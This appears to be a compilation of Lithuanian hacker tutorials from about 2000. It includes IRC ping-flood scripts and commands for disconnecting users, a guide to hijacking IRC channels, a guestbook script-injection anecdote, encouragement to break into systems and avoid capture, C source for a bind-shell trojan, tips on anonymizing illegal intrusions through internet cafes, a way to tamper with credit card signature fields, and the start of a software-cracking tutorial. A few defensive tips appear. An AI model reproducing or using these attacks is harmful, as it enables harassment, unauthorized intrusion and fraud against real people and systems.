ﾚﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｿ

ｳ [[4]] chiuvakas kaska negero pasake ? nori kersto ? ｳ

ｳ atjungiam chiuwaka ? (ir kajp nuo to paciam ｳ

ｳ apsisaugot) ｳ

ﾀﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾙ

shiaip tokiaijs dalykajs nepatariu uzsiiminet …

taj yra lameriska … bet kartais buna tokiu atveju kaj buna px ant wisko ir tiesiog norisi pamokyt chiuwaka … tokiu atveju pirma ka reikia padaryti priesh karo veiksmus taj ishsiaiskint ant kiek tas chiuvax kietas … darom „/ctcp [chiuvako nick] version”

ir laukiam atsakymo … tajgi gavom atsakyma pvz :

mirc v5.81 (kuo senesne tuo geriau ) ir viskas nereiketu rautis ant tu pas kuriuos gaunat atsakyma

BichX v.(nesvarbu kokia) ar kaska kas susije su UNIX

(linux … openbsd … ir t.t. nes greiciausiaj nieko neisheis 😉 … taipogi nepatarciau prasideti su chiuwakajs ish kuriu gavot pvz : mirc v.(nesvabu) ir dar gavot kokianors skripto reklama pvz :

[ agurkaz-script by mr2 ] [ http://mr2lt.cjb.net ]

(chia mano skripto varijantas) … nes papraschiausiai vilties pamokyt toki chiuwaka mazaij … (nors shiaip …

manes karta paprase kad ishmeginchiau jo script (dabar tixliaj nepamenu koki script) … ir jis luzho zymiaj greiciau nej zmogus be script … o shiaip atjungsi chiuwaka nuo servo ar ne dar labaj priklauso nuo tavo ineto beij jo ineto rysio … tajgi ishiaiskine chiuwako „kietumo lygi” 😉 ir nusprende ji issabacint ish servo … pvz : parsisiunchiam agurkaz-script (ish http://mr2lt.cjb.net) … spaudziam „klonuotiz” ir prijunge antra mIRC’a prie servo imames chiuwako mirties … zodziu spaudziam fludaz/ping fludaz (shis mano (ir netik) nuomone veiksmingiausias) gaunam „musu tajkinyz ?” irasom musu aukos nick …

„kiek pingu siusim ?” irasom pvz : 1000 (shiaip uztenka apie 200 … bet tikrumo labuj) … „laikaz (sekundem)

tarp [ping] ?” irasom pvz : 2 (nemaziau 2-ju … o shiaip wiskas priklauso nuo jusu ineto ryshio kokybes … kuo prastesne tuo labiau didint …) tik shikart nespaudziat ok … wiska tapati pasidarot ir kitame jau paleistam mIRC’e ir viena po kito (abiejuose)

paspaudziat ok … ir pradedat stebet kas vyksta …

stebit ping reply … kur ping reply laikas turetu vis didet … ir po shiek tiek lajko „blogiukas” padaro quit (excess flood) 😉 (kad padarys luzhau galima tiketis gavus ping reply laika … apie 40sek …

ir daugiau … o kartajs ir maziau …) kaj chiuwakas luzhta … arba pvz : tau niekajp nepavyksta jo atjabalint … tiesiog sustabdom fluda …

fludaz/sustabdyt visuz fluduz …

tapati galima padaryt i aliases irasius pvz :

/fludazzz {

.set %tajkinys $$?=”musu tajkinys ?”

.timer10 $$?=”ping sk. ?” $$?=”laikas tarp ping ?” /ctcp %tajkinys ping

/stopfludazzz {

.timer10 off

ir tada norint fludint reik parasyt „/fludazzz” komanda …

o norint nutraukt ping fluda „/stopfludazzz”

(na norint totaliaj pasitychiot ish lamuxos … atjunge ji pasikeiskit savo klono nick y jo … sugryzes chiuwakas dar ilgaj stebesis „kas chia do veikejas tokipati nick kajp mano sugalvojo ? ir dar klausia ‘kaijp sekas lama ? ;)’ ?!?”)

kaip visa taj vyksta ? … ogi paprastaj : servas paprastaj supyksta jej kaskoks „kenkejas” pradeda be skaiciaus siust ctcp’us ir jej pvz : „laikaz (sekundem) tarp [ping] ?”

irasytumet pvz : 0 … shiuo atveju servas jus atjungtu (kaijp kenkeja) parasydamas excess flood … o kaij jus kaskam siunciat ping’us … tas kaskas i juos atsakineja pong’ais ir servas supykes uzh vienu metu siunchiama dideli kieki pong’u ji atjungia … (tam kad greiciau atjungt kokitaj chiuwaka ir patariama pasidaryt keleta klonu … nes ping’us tada siuncia keli irc klientaj … o pong’ais atsakineja vienas 😉

tiesa nevisada ping’inamas chiuwakas atjungiamas (excess flood)

yra ir kitas bajeris (tiesa rechiau suveikiantis) … reiskias jus pastoviai siunciat tuos ping’us (ish 2-ju ar daugiau klonu)

ir kaijp iprasta servas karts nuo karto siuncia PING „paketa”

t.y. kaskokitaj skaiciu … irc klijentas gaves shi „paketa”

siunchia servuj PONG „paketa” tapati skaiciuka koki gavo …

taj daroma tam kad servas zinotu „esi gyvas ar nebera taves ?”

… ir kaj chiuwako irc klijentas beatsakinedamas i tavo siunchiamus PING’us pervelaj atsako servuj … servas pagalvoja kad irc userio nebera … ir nesvarbu yra jis ar ne ji papraschiausiaj atjungia parasydamas ping timeout (shitas bajeris suveikia tik tada kaj chiuvako kuri pinginat : senas kompas …

blogas rishys … zodziu kaj chiuwakas ir tajp netoli mirties ir tereikia truputi jam padet 😉 ) …

na o pamacius kad visa taj daroma su jumis (jus auka 😉 ) …

tiesiog papraschiausiaj reikia uzdeti tam chiuvakui ignora (komanda : „/ignore [nick’as]”) … (daugelyje skriptu taj darosi automatiskaj … kaj chiuwakas per tamtikra laika padaro tamtikra skaiciu ctcp … kad ir pvz : (mano)

agurkaz-script’e)

tapati galima padaryt i remote irasius pvz :

CTCP *:*:* {

if ( %ctcppro. [ $+ [ $nick ] ] == $null ) {

.set %ctcppro. [ $+ [ $nick ] ] 1

.timer 1 10 unset %ctcppro. [ $+ [ $nick ] ]

goto pabajga

elseif ( %ctcppro. [ $+ [ $nick ] ] == 1 ) {

.set %ctcppro. [ $+ [ $nick ] ] 2

.timer 1 10 unset %ctcppro. [ $+ [ $nick ] ]

goto pabajga

elseif ( %ctcppro. [ $+ [ $nick ] ] >= 2 ) {

.ignore $nick

.echo -a 10[*] $nick katik isbande (mass) ctcp apsauga

.unset %ctcppro. [ $+ [ $nick ] ]

goto pabajga

:pabajga

.halt

ir tam kad variables nesirinktu siuksliu …

options/irc/perform/ uzaktyvuoji (varnele)

„on connect,perform these commands :” ir irasaj :

„/unset %ctcppro*” komanda … spaudi [OK]

ping fluda galima daryt netgi pasinaudojus dos’u pvz :

dos’e rasom :

„ping [chiuwako kompo IP]” (chia reikia zhinoti chiuwako kompo IP adresa … jis suzinomas „/dns [nick’as]” komanda sia komanda pingas siunchiamas viena karta …)

„ping -l 2800 -t -w 2000 [chiuwako IP]” (staj shia komanda ir galima atjungt chiuwaka … (nesigilinsiu y tixlumus …

jej norit detaliau … tiesiog parasykit dos’e „ping” ir gausit gana ishsamia informacija …)) toliau pakalbesiu apie

DOS ataka (nemaisykit dos operacines sist. su Denial Of

Service ataka 😉 )

na zinoma taj ne pac geriausias budas kanors atjabalint nuo irc servako … kalbu apie DOS (denial of service)

ataka … bet ping fludas manychiau pac populiariausias tarp irkininku 😉 … apie DOS atakas daug nekalbesiu (shiaip nuo shios atakos jau gana senaj buvo luzhes net pac www.microsoft.com na o netajpjau senaij (jej zhiurit te-ve) nuo jos nukentejo ir www.yahoo.com bej keletas kitu ineto gigantu 😉 (tiesa uzhpuolikas buvo susemtas (mafiaboy berods)) ) shi ataka kajp jau supratot yra gana daug qr naudojama (paprastaj destrukcijos tixlais)

… shios atakos pasekmes neprognozuojamos taj galibut pradedant nuo paprasto kompo pakibimo iki „format c:”

(zodziu priklauso ant kiek jusu kompas supsixuos)

zodziu naturaliaj inete viskas vyksta taijp : jusu kompas siunchia kitam kompuj SYN „paketa” t.y. prasyma prisijunkti prie kito kompo (chia pvz: ftp http telnet)

… kompas (servas) gaves SYN tuojpat siunchia jums atsakyma ACK „paketa” t.y. patvirtinima apie SYN

uzklausa jusu kompas prisijungima su kitu kompu uzhtvirtina nauju ACK „paketu” (shio ACK servas laukia keleta min. sek. ir jej negauna ACK (ish jusu) ishmeta ish whaitlisto) … na o dabar isivaizduokit kas darosi jej jus vienu metu uzhplustat serva vien SYN „paketajs”

ir neatsakinedami prisijungima patvirtinanchiais ACK …

ogi dideja servo waitlistas … niekas negali prisijungt prie servo (jis apkrautas) … ir tarkim jej jus puolat shi kompa ish keliu kompu vienu metu ankschiau ar veliau jis padaro „luzhau” (tas pac www.yahoo.com pavizdys)

panasiu principu atakuojami netik servaj bet ir paprasti kompaj … zodziu apie mIRC’a … pac populiariausias shiu laiku nuke’ris beabejo „click v2” ji galite parsisiusti beveijk ish kiekvieno uzhsenietishko servo (daznaj buna platinamas kartu su mIRC skriptajs) … jis veikia DOS

atakos principu zodziu pasirenkat auka … darot

„/dns [nick’as]” … status lange sulaukiat „resolved *.*.*.*” (vietoj ->*<- skaiciukaj pvz: 127.0.0.1)

taj yra chiuwako kompo IP adresas (jej gavot „unable to resolve” tada pysy-propalo … geriau pamirskit ji) … ji irashot y betkokio nukerio „IP”

langeli ir vaziuojam … laukiam kol chiudikas „mirs” 😉

na beabejo nuo to yra apsaugu pvz : nukenabber … bet shio dajkchiuko paprastaj niex naudoja (tie kas nori apsigint nuo visokiu DOS (be DOS dar yra pvz : Smurf …

Land&Teardrop (visu veikimas panasus)) ataku paprastaj turi pasistate FireWall’us ir ju su shitom atakom nepaimsi ;))

ﾚﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｿ

ｳ [[5]] lameriska instrukcija TAKEOVERINKUJ 😉 ｳ

ﾀﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾙ

tajgi tajgi … tu esi visiskas lama (ar tiesiog gera nuotajka ir nori pasilinksmint (pagazdint vargsus irc userius)) (nepagalvokit kad taj darau nuolat (bet yra buve (neslepsiu)) … shis pamokymas kajptik tau …

pirma ka reikia padaryt besiruosiant teikoverint kanala aisq reijkia (apgalvotaj) pasirinkt taikini … reiskias rasaj „/list” ir lauki kol list lange pasirodys visi tuo metu esami kanalaj … renkiesi nej dideli nej maza …

kokiu 5-9 zmoniu kanala (chia pagal skoni 😉 )

!!!neuzejni i ji!!! … tau pvz : patiko #lamers kanalas rasaj „/names #lamers” ir status lange pamataj chiuwaku sedinciu shiame kanale sarasa … !!!patarimas-ispejimas!!! :

kanale kuri pasirinkaj turetu sedeti keli zmones turintys o’pus (@) t.y. tau reikes bent keliom sekundem atjungti viena ish ju … ir po vieno ish ju luzhimo kanale turi likt bent vienas zmogus su @ … t.y. ne botas … ne klonas nes jis (jej kvailas ir nesupranta kas yra excess flood …

palaikes tave savo draugu) ir turi tau duoti op’a …

kurio tau ir reikia norint takeover’int kanala … toliau :

jej pasirinktam kanale sedi @rkp shita kanala geriau pamirsk 😉

pasirinkus kanala ir chiuwaka kuris tures trumpam luzhti daraj :

„/ctcp [nickas] version” (zodziu kad nesiplesciau pasakysiu kad reikia ji atjungti nuo irc nors keliom sekundem …)

(apie taj rasiau truputi ankschiau … (jej shizofrenija sergi)) ji atjungus nuo servo stajgiai keiti savo nick’a i jo nick’a (tam reijketu iskart pasiruost) ir uzeini y (musu atveju) #lamers kanala … tada jej pasiseks to chiuwako draugaj kuri tu katik atjungej tau duos op’a ir poto manau tu pac zhinaj ka reikia daryti 😉 (massdeop … zodziu tu turi likt vienas turintis @ priesh savo nick 😉 ) ir tada daraj kanori su perimtu kanalu … o vargsaj apgautieji tik ir spjaudos keiksmais … grasina nukeriu … ping fludu 😉 (na jej esi tikras lama aisq greitaj padaraj luzhau … ir buni itrauktas tu chiuwaku shitlist’us (sudziu sarasus))

na o norint nuo to apsisaugot … reikia tiesiog but atidesniais … pamacius quit(excess flood) reiketu isitikint kad gryzo jusu draugas ir jej esat jums brangiam kanale be rkp geriau pasisaugokit … (man paciam buvo bajeris kaj 2-se susikurem nuosalu kanala ishbandyti mano script … uzhejo chiuwakas davem jam op’sa o tas 2-viem savaitem bota su invite only pastate (kanalo aisq negajla … laikinas buvo) bet pamokele gera 😉 )

taipogi neuzdejinet autoOPo kad ir net paciam geriausiam drauguj pagal nick’a … (maza kas gali atsitikt … sugalvos kox loxelis nick’a kaijp tavo draugo pasiimt ir uzheis netycia y kanala …

gaus op’a ir priximicins)

ﾚﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｿ

ｳ autorius : mr2 ｳ

ｳ data : 2000 ｳ

ｳ url : http://mr2lt.cjb.net ｳ

ｳ @mail : mr2@xxx.lt ｳ

ﾀﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾙ

(shi straipsneli leidziu laisvaj platinti inete be mano leidimo tik butu labaj grazu kad jo turinys nesikeistu … o del gramatiniu klaidu nepykit (ne spaudaj ji parashiau 😉 ) jej aciras norinciu kad parasychiau tutorial’a apie mIRC skriptu rasyma … ar norinciu patart … pataisyt … papildyt shi TUT … mano @mujla zhinot)

(mIRC’e mane galit rasti pvz : #mr2 kanale nick: „mr2” arba „agurkaz”)

21. Kaip nesielgti hakinant

Kaip nesielgti Jus taip nedarykite Vasara del savo neismanymo nukentejo daugelis Lietuvos svetainiu: centras.lt search.lt ir kitos, kuriose buvo skelbimu lentos ar guestbook`ai. As maniau, kad tai buvo gera pamoka ju administratoriams, bei visiems kitiems. Bet pasirodo as klydau. Viena diena, narsydamas www ir sededamas IRC radau nuoroda i viena idomu puslapi: www.satan.lt – juodosios brolijos puslapis. Uzsukes i ji ir perzvelges, sumaniau uzsukti i guestbook`a ir pagirti saita. Uzsikrovus guestbook`ui pamaciau kazka panasaus i tai: galima ivesti html komandas. Pvz: vietoj [ENTER] galima rasyti

. Ir ka jus apie tai manot??????????? Ar tai ne administratoriu klaida, baisi klaida? Bet, pagalvojau as, gal jie nors JavaScrip filtruoja? Tad as emiau ir isbandziau tai.

Paprasciausiai irasiau prie savo girtino/peiktino teksto keles eilutes: ; beto idejau nuoroda i uid0 saita: Aisku as galejau visiskai sudirbti si saita: JavaScript pagalba galejau atidaryneti, uzdarineti langus, bei daug daug kitko, iterpus nuoroda i file:///con/con/ galejau nukepti visus win 9.x vartotojus, kurie ten uzklystu. Bet as taip nesiilgiau. As paprasciausiai padariau tik ispejima puslapio webmaster`iui.

Kur sio dokumento vertes objektas? Viena kart ismokite daryti tai gerai, ismokite mokytis ne tik is savo bet ir is kito klaidu. Filtruokite savo chat`uose, guestbook`uose, mesage bourde`uose ir kitur kur lankytojai gali ivest teksta (ir jis bus spausdinamas html dokumente) visus HTML tagus, neleiskite vykdyti JavaScript, VisualBasic ir pan. Narsykite www tik isjungia Java. Taip jus isvenksite Java/JavaScript ataku. P.S. As tai nelaikau tikru hackinimu, tai paprasciausiai…

22. Kaip tapti hakeriu

Pirmiausia, manau, apsispresk ar tikrai nori buti hackeriu, nes:

1. Hakeriavimas yra nelegalus (bent daugelyje valstybiu [Lietuvoj kolkas ne]). Netgi tuose valstybese, kuriuose hakerevimas nera antiistatimiskas hakeris vistiek pazeidzia dauguma istatymu. Pvz.: asmens teise i privatuma (E-mail, www, acount ir kt.).

2. Hakeriavimas nera lengvas uzsiemimas, tu turi vis ieskoti ir ieskoti daug info apie naujausius exploitus (arba kaip tikras hakeris juos paciam daryti), ieskoti sistemu klaidu etc. Todel hakervimas dar ir daug laiko uzimantis uzsiemimas. Negalima per savaite tapti hakeriu. Tai pat negalima dometis tuo puse metu ir poto padarius pauze vel gristi. Ne, tu paprasciausiai per daug atsiliktum. Ne taip negalima!

Negalvok, kad filmuose apie hackerius, kopmiuteriu piratus etc rodoma tiesa. Negalvok, kad hakeris koks herojus, gebantis prikirsti visas paneles, dirbantis geroje firmoje etc. Priesingai- ar tau patiktu matyti savo artimuosius, draugus verkencius, liudincius kai tave sujima teisesauga, VSD (valstybes saugumo departamentas).

Bet jai vistiek apsisprendei tapti hakeriu tai pradek kuo greiciau, nes sis informasinis pasaulis keiciasi taip greit, kad nekiekvienas geba ji pasivyti ir neatsilikti.

1.Kaip pradeti?

Daugelyje interneto sistemu stovi UNIX, LINUX, FreeBSD, NetBSD, vienu zodziu, *NIX. Tad norint pradeti hakinti reikia ismokti tai. Aisku negalvok, kad nereikia ismokti windows`u. Priesingai, juos irgi reikia ismanyti. Jei nezinojai yra net ir speciali windowsu versija (distribucija ar pan) skirta serveriams. Tai windows NT.

Taigi griskime prie *NIX. Gauk kokia tai *NIX distribucija, instaliuok ja ir pradek mokytis. Kaip mokytis *NIX? Pradziai gauk pora knygu, tokiu kaip „Linux zaliems” ar pan. Perskaityk jas. Poto imk ka nors rimciau. dalyvauk konferencijuose kuriose snekama ape *NIX. Priprask prie *NIX. Paprogramuok juose. Ismok gerai konfiguruoti sistema. Automatizuok savo veiksmus darydamas skriptus. Ismok *NIX`e (ir netik ten) naudotis internetu (E-mail, telnet, ssh, www, ftp, irc, icq ir kt.). Jei ko nors nezinai nepulk klausineti visu. Paprasciausiai RTFM (read the fucking manual). Niekada negalvok, kad *NIX`e viska jau ismanai.

Na daba jau tu ismanai pakankamai apie *NIX. Gauk savo tikra (ne localu) acounta.

Narsyk www, siurb visa info apie hakinimo metodus, nauja programine iranga, jos klaidas (bug`us). Stenkisc pats rasytis exploitus. Tam turi ismokti keleta programavimo kalbu: c/c++, perl, java.

Prisiregistruok prie ivairiu hakeriu konferenciju, naik i pora IRC serveriu- ten rasi bendraminciu,galesite pasidalinti info ar pan. Nepralesk pro akis nei vieno hack saito.

Ismok neikliuti! Nes kai ikliusi bus per velu! Kaip neikliuti skaityk straipsnyje paranoja.

Ieskok pazeidziamu sistemu ir hakink jas. Tavo tikslas gauti kuo daugiau acount`u is kuriu galetum hakinti kitas sistemas.

Ir jei tu viska darai, kaip parasyta cia- tada gali tapt hakeriu.

23. Kaip veikia trojanai

Cia pabandysiu paiskinti kokiu principu veikia trojanai, kaip jie rasomi etc.

Imkim ir panagrinekim paprasciausia trojana parasyta C kalba:

#include <stdio.h> // iterpiamas standartinio I/O funkciju headeris

#include <errno.h> // klaidu

#include <signal.h%gt; //signalu. Nezinot kas tie signalai? Tai kaip jus naudojates kill programa?

#include <stdlib.h>

#include <netinet/in.h> // iterpemi visi headeriu failai reikalingi dirbti su tinklu, socket ir pan.

#include <sys/types.h>

#include <sys/socket.h>

#include <strings.h> // darbui su eilutem

// Nusirodyk koki tavo trojanas porta naudos, naudok koki standartini- gali lama adminas pamirses sumaisyt su kokiu ftp_data (20 portas) ar pan

// Kitu atveju naudok koki kita porta kuris maziau stebimas

#define P 12345 // ant prikolo imam netbus porta

#define SH „/bin/sh” // nusirodai koki shella naudos tavo trojanas

#define LISTN 5

int main(int argc, char **argv)

//pasveikinimo (welkome) zinute char *fst = „nConnected!nn”;

char *sec = „This tool demonstrated how works trojansn”;

char *thr = „Please enter each command followed by ‘;’n”;

int outsock, insock, sz; //soketu deskriptoriai, ir pagalbinis kintamasis, kuris saugos eiluciu dydi (size)

//reikalingos dvi soketu sructuros (irasai) in ir out struct sockaddr_in home;

struct sockaddr_in away;

//set port, proto and bzero for BIND

home.sin_family=AF_INET;

home.sin_port=htons(P); // atkreipk demesi cia nurodomas taviskis portas home.sin_addr.s_addr=INADDR_ANY;

bzero(&(home.sin_zero),8);

signal(SIGCHLD,SIG_IGN);

// pats idomumas prasideda if((outsock=socket(AF_INET,SOCK_STREAM,0))<0) // ar su soketais viskas ore exit(printf(„Socket errorn”));

if((bind(outsock,(struct sockaddr *)&home,sizeof(home))<0)) // ar bindina ore exit(printf(„Bind errorn”));

if((listen(outsock,LISTN))<0) //ar listina exit(printf(„Listen errorn”));

sz=sizeof(struct sockaddr_in);

// jo cia tai tikrai strukturinis programavimas for(;;) // o rimciau tai amzinas ciklas

if((insock=accept(outsock,(struct sockaddr *)&away, &sz))<0) //laukiam isoriniu signalu, tuo paciu tikrinam ar nera klaidos exit(printf(„Accept error”));

if(fork() !=0) //jei sukuriam, dukterini (child) procesa

send(insock,fst,strlen(fst),0); // siunciam sveikinimo zinute send(insock,sec,strlen(sec),0);

send(insock,thr,strlen(thr),0);

dup2(insock,0); // nukreipem STDIN (file deskriptos=0) i soketa dup2(insock,1); // nukreipiam STDOUT (file deskriptos=1) i soketa dup2(insock,2); // nukreipiam STDERR (file deskriptos=2) i soketa execl(SH,SH,(char *)0); // paleidziam savo shella close(insock); // uzdarom soketa exit(0); // stai ir baigesi musu sudetingas trojanas.

close(insock); // jei nejo sukurt dukterinio proceso (ziureti fork() ) tai uzdarom ansyk soketa ie einam lauk.

Stai taip atrodo pats elementariausias trojanas. O jus turbut manete, kad tai sudetinga. Siaip sis trojanas ira gan blogas. Jei norite gero trojano eikit i http://packetstorm.securify.com ir isten temkit r00tkit`a. Siuo metu as kaip tik apsistojes ties trojanu rasymu, kai parasysiu koki krutesni imesiu. Tad laukite.

Kas sake kad lietuviai trojanu neraso?

Kaip anonimizuotis kitu budu/keliu

By Whisperer // whisperer@worldmailer.com for www.underground.lt

Visi nori anonimizuotis. Visi privalo anonimizuotis jeigu uzsiima ne tik narshymu po puslapius apie geliu auginima, o daro ka nors nelegalaus. Populiariausias budas proxy servai. Tachiau su vienu nieko nepadarysi. Jeigu tikrai nori gerai anonimizuotis turi susijungti i grandine proxy1>proxy2>proxy3 etc. Dar geriau jeigu tie proxiai kinietishki, japanski ar dar kokie (sunkiau susisiekti su ju adminais ir gauti tavo ip adresa)

Tachaiu sparta ziauriai, ziauriai krenta. Ir norint patekti i vilniu ish kauno gaunasi vaziavimas per klaipeda. Ash siulau kita buda. Mieste pilna (bent jau Kaune) visokiu internet’o kaviniu ir t.t. Kai kurios labai nuoshalios ir ten tam tikrom valandom nebuna daug zmoniu (pvz. Sonex’as savanoriu prospekte prie Juzes). Mokestis iki 6 lt uz valanda.

Ateini, atsineshi savo irankius, savo reikalinga infa, pasedi valandele, nuhackini ka nors ir pasishalini. Atseks ip adresa nuhackinto servo adminai ir bus jiems ledas.

Aishu jeigu nori galima ir ish ten jungtis per kelis proxius (paprastai tokiose vietose ryshys boona geresnis nei per dial-up’a) ir „nuskriausti” adminai tures dar daugiau vargo. Mazai tiketina kad zmogus prileides tave prie interno atsimins ir gales nupasakoti tavo ishvaizda, o tavo duomenu jis nezinos. Aishku nebookit durniai neikit antra kart i ta pachia vieta.

kam daryti sunkiau jei galima lengviau?

2000(c) by Whisperer // whisperer@worldmailer.com

24. Kreditines korteles

Parenge: MG, 1999, Kaunas

Pagal: ‘Credit Carding’ by David Lightman and ‘The Administration’

Kreditines korteles turi mazhiausia 3 apsaugos priemones, kuriu jus neturetumete iveikti. Tai yra saskaitos numeris, parasho laukas ir magnetine juosta.

Saskaitos numeris

Telefono numeris kartu su miesto kodu turi 8 skaiczius, asmens kodas – 11.

Tacziau pilnas MasterCard kreditines korteles saskaitos numeris turi 20

skaicziu. Kam tiek daug?

Matematishkai kreditines korteles numeriui pakanka ashtuoniu skaicziu.

Kiekvienas korteles savininkas, be abejo, turi tureti unikalu, nesikartojanti numeri. Kompanijos Visa ir MasterCard turi mazhdaug po

65 mln. klientu kiekviena. Taigi ju numeracijos sistemos turi sutalpinti apie

65 milijonus imanomu numeriu.

Egzistuoja shimtas milijonu imanomu kombinaciju ish ashtuoniu skaicziu:

00000000, 00000001, 00000002, 00000003, …. iki 99999999. Taigi, ashtuoniu skaicziu visishkai pakanka. Ateities augimui numatyti, saskaitos numeriui pakaktu devyniu skaicziu, kas uzhtikrina milijarda skirtingu numeriu.

Faktishkai, Visa kortele turi 13 skaicziu, American Express – 15, Diners

Club korteles – 14, Carte Blanche – 10. Abejotina, kad kredito kompanijos planuoja tureti visus shiuos milijardus klientu ir suteikti jiems skirtingus numerius. Shie papildomi skaicziai reikalingi saugumo sumetimais.

Tarkime, jusu Visa korteles numeris yra 4211 503 417 268. Kiekvienas pirkinys turi buti ivestas i kompiuteri ish prekybos terminalo. Saskaitos numeris susieja pirkini su jusu saskaita. Asmenys, ivedantys saskaitu numerius i kompiuteri gali kartais suklysti ir ivesti pvz. 4211 503 471 268

arba 4211 703 417 268. Taigi shios trylikos skaitmenu numeracijos sistemos privalumas yra tas, kad tikimybe, kas kitas klientas tures saskaitos numeri atitinkanti 4211 503 471 268 arba 4211 703 417 268 labai mazha. Egzistuoja

10 trilijonu imanomu trylikos skaitmenu Visa numeriu (0000 000 000 000;

0000 000 000 001; ……… 9999 999 999 999). Tik apie 65 mln ish ju yra tikri, egzistuojantys saskaitu numeriai. Tikimybe, kad klaidingai ivestas korteles numeris atitiks egzistuojanti numeri yra kazhkas apie 1 prie

150 000. Kitos korteliu numeracijos sistemos yra dar saugesnes. Ish kvadrilijono imanomu penkiolikos skaitmenu American Express korteliu numeriu tik 11 milijonu yra naudojami. Tikimybe kad atsitiktinai surinktas numeris atitiks egzistuojanczios saskaitos numeri yra mazhdaug 1 prie

90 000 000. Imant visus 20 MasterCard numerio skaitmenu, yra kvintilijonas

(100 000 000 000 000 000 000) imanomu numeriu 65 milijonams klientu.

Galimybe atitaikyti numeri czia nevirshija vieno prie pusantro trilijono.

Be kita ko, tokia sistema suteikia galimybe ‘neakivaizdinei’ prekybai, apmokant kreditinem kortelem. Pvz., kai TV-reklamos siulo skambinti ir uzhsisakyti kokia nors preke telefonu, operatores, kurios priima uzhsakymus negali matyti nei kreditines korteles, nei jos savininko parasho. Kaip jos gali zhinoti, ar skambinantysis ishvis turi kreditine kortele?

Jie grindzhia savo pasitikejima kreditiniu korteliu numeracijos sistemos saugumu. Jeigu kas nors skambina ir panaudoja ishgalvota numeri, shis numeris, tikriausia, neatitiks egzistuojanczios saskaitos numerio. Ar toks numeris egzistuoja ar ne, galima patikrinti labai greitei, pasijungus prie kredito kompaniju kompiuteriu. Visais praktiniais tikslais, naudojant leva kreditkes numeri, yra vienintelis budas – nuskaityti ji nuo egzistuojanczios kredito korteles. Plastiko gabaliukas nera butinas, pakanka numerio.

Parasho laukas

Jus negaletumete ishtrinti parasho korteleje, jeigu gaunate leva kreditke. Jeigu jus ar kas nors kitas megintumete tai padaryti, greit isitikintumete, kad kortele tampa visishkai nebetinkama naudoti, (bent jau jos jau negalima rodyti). Kai kurios korteles turi specialu parasho lauko pagrindo dizaina(linijini ornamenta), kuris nusitrina, jei kas nors bando ishtrinti parasha, paliekant balta plema. Ant kitu, bandant ishtrinti parasha, pro pazheista parasho lauko pagrinda pasirodo zhodis ‘VOID’, zhymintis korteles netinkamuma naudoti.

Budas apeiti shia saugumo priemone

Jeigu parasho laukas neapsaugotas linijiniu ornamentu arba sunkiai atkartojama spalva, parasho lauka galima uzhdazhyti.

Magnetine juosta

Daugelis mano, kad magnetineje juostoje uzhkoduota daug informacijos apie korteles savininka, arba apie saskaitos balansa. Realiai, joje neimanoma irashyti daugiau, nei i panashaus ilgio garso kasetes juosta.

Ishtikruju magnetineje juostoje pakanka irashyti saskaitos numeri ar kitokia identifikacijos priemone. Bet kokia kita informacija, reikalinga pinigu pervedimui atlikti, tokia pvz. kaip saskaitos balansas, gali buti ishtraukta ish banku kompiuteriu ir nera reikalo kodoti jos paczhioje korteleje. Ta pati galima pasakyti del informacijos apie korteles savininka. Be identifikacijos, magnetineje juostoje gali buti irashyta galiojimo data, nes bankomatai kartais ‘prarija’ kortele, kai jos galiojimo laikas pasibaiges, netgi jeigu balansas yra tvarkoj.

Informacija magnetineje juostoje galima ishtrinti palaikius virsh jos stipru magneta.

25. L0phtCrack v2.5 krekinimas

Info:

Autorius: PauliuZ (pauliuz@xxx.lt, www.pauliuz.cjb.net)

Irankiai: SoftICE, WinDasm, UCOL Patch Maker, Betkoks šešioliktainis redaktorius

Taikinys: L0phtCrack v2.5 (www.l0pht.com/l0phtcrack)

Intro:

Šis tekstas yra skirtas tiktai mokslo tikslams ir teksto autorius neatsako už netinkamą jo naudojimą! O dabar jau galime pradėti.

Pora sakinių:

Būtų gerai, kad jūs turėtumėte bent „žalią” supratimą apie SoftICE, WinDasm, šešioliktainį redaktorių ir asembler kalbą. Bandysiu paaiškinti bent jau pagrindines SoftICE klavišų kombinacijas ir jos suderinimą.

Suderinimas:

SoftIce yra paleidžiama iš autoexec.bat paskutineje eilutėje įrašius: [kelias iki SoftIce]winice.exe. Pvz.: C:SoftICEWinIce.exe, todėl SoftIce pasileidžia kraunantis windowzei.

Taip pat reikia suderinti ir winice.dat failą. Pateiksiu winice.dat failo fragmentus, kurie turi buti (daugtaškiai reiškia praleistas vietas):

INIT=”CODE ON; X;”

EXP=c:windowssystemkernel32.dll

EXP=c:windowssystemuser32.dll

EXP=c:windowssystemgdi32.dll

Kombinacijos:

Ctrl+D – įeiti į SoftICE;

F5 – įšeiti iš SoftICE;

F10 – vykdyti programą po vieną eilutę;

